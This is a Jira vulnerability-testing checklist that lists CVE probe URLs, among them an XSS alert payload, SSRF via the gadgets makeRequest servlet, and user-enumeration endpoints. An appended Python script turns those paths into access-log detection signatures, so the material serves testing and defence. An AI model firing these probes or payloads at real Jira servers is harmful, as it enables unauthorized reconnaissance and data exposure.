1. CVE-2020-14179 (Information Disclosure)
a. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.
2. CVE-2020-14181 (User Enumeration)
a. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<uname>
Harsh Bothra
@harshbothra_
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to <JIRA_URL>/browse.<project_key>
b. Observe the error message for a valid vs. an invalid project key. Apart from enumeration, you can often get unauthenticated access to the project if the protections are not in place.
4. CVE-2019-3402 (XSS)
a. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
5. CVE-2019-11581 (SSTI)
a. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
8. CVE-2019-8451 (SSRF)
a. Navigate to <URL>/plugins/servlet/gadgets/makeRequest?url=https://<host>:1337@ea.com
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that user-related information is available.
10. CVE-2019-3403 (User Enumeration)
a. Navigate to <JIRA_URL>/rest/api/2/user/picker?query=<user_name_here>
b. Observe the difference in the response when a valid vs. an invalid user is queried.
11. CVE-2019-8442 (Sensitive Information Disclosure)
a. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
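
For defenders, the request paths in this checklist double as access-log signatures. The following is an added example (not part of the original thread): a Python script that scans web access logs for these paths and flags clients that touch several of them. The combined log format, the sample lines, and the names `scan` and `sweepers` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path patterns from the checklist above, keyed by the CVE each path relates to.
SIGNATURES = [
    ("CVE-2020-14179", re.compile(r"/secure/QueryComponent!Default\.jspa", re.I)),
    ("CVE-2020-14181", re.compile(r"/secure/ViewUserHover\.jspa\?.*username=", re.I)),
    ("CVE-2020-14178", re.compile(r"/browse\.[\w-]+", re.I)),
    ("CVE-2019-3402", re.compile(r"ConfigurePortalPages!default\.jspa\?.*searchOwnerUserName=[^&]*[<>]", re.I)),
    ("CVE-2019-11581", re.compile(r"/secure/ContactAdministrators!default\.jspa", re.I)),
    ("CVE-2019-8451", re.compile(r"/plugins/servlet/gadgets/makeRequest\?.*url=[^&]*@", re.I)),
    ("CVE-2019-8449", re.compile(r"/rest/api/[^/]+/groupuserpicker", re.I)),
    ("CVE-2019-3403", re.compile(r"/rest/api/2/user/picker", re.I)),
    ("CVE-2019-8442", re.compile(r"/s/[^/]+/_/META-INF/", re.I)),
]
# Assumed input: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return {client_ip: {cve_id: [http_status, ...]}} for matching requests."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line: skip instead of failing
        ip, target, status = m.group(1), unquote(m.group(2)), int(m.group(3))
        for cve, pattern in SIGNATURES:
            if pattern.search(target):  # matched on the URL-decoded target
                hits[ip][cve].append(status)
    return hits

def sweepers(hits, min_distinct=3):
    """Clients that requested several different checklist endpoints."""
    return sorted(ip for ip, cves in hits.items() if len(cves) >= min_distinct)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
_T = "- - [23/Jun/2022:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 {_T} "GET /secure/QueryComponent!Default.jspa HTTP/1.1" 200 512',
    f'192.0.2.10 {_T} "GET /secure/ViewUserHover.jspa?username=admin HTTP/1.1" 200 90',
    f'192.0.2.10 {_T} "GET /plugins/servlet/gadgets/makeRequest?url=https://jira.example.test:1337@example.com HTTP/1.1" 403 0',
    f'192.0.2.10 {_T} "GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1" 200 70',
    f'198.51.100.7 {_T} "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 200 300',
    f'198.51.100.7 {_T} "GET /browse/PROJ-12 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print({ip: dict(cves) for ip, cves in found.items()}, sweepers(found))
```

Several of these paths also serve legitimate traffic, so treat a single hit as a triage lead and give more weight to one client touching many of the endpoints in a short window.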